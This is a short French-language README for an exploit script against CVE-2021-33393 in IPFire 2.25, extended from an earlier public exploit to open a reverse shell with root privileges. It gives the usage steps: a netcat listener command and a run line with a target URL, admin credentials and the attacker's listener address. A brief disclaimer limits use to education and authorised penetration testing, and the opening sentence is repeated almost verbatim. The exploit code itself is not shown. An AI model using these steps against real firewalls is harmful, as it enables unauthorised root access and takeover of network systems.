
Cet exploit est basé sur CVE-2021-33393 et a été construit à partir de l'exploit original de Mücahit Saratar, en l'étendant pour obtenir un shell inversé avec des privilèges root.
Cet exploit est basé sur CVE-2021-33393 (https://nvd.nist.gov/vuln/detail/CVE-2021-33393) et a été construit à partir de l'exploit original de Mücahit Saratar (https://github.com/KaanaryOverFlow/ipfire-2-25-auth-rce), en l'étendant pour obtenir un shell inversé avec les privilèges root.
Démarrer un écouteur :
nc -lvnp 4444
Exécuter l'exploit :
python exploit.py https://192.168.0.10:444 admin 'admin@123' 192.168.0.11:4444
Cet exploit est uniquement destiné à des fins éducatives et à des tests de pénétration autorisés.
Ne pas l'utiliser contre des systèmes pour lesquels vous n'avez pas explicitement l'autorisation de tester.
L'auteur n'est pas responsable d'une mauvaise utilisation.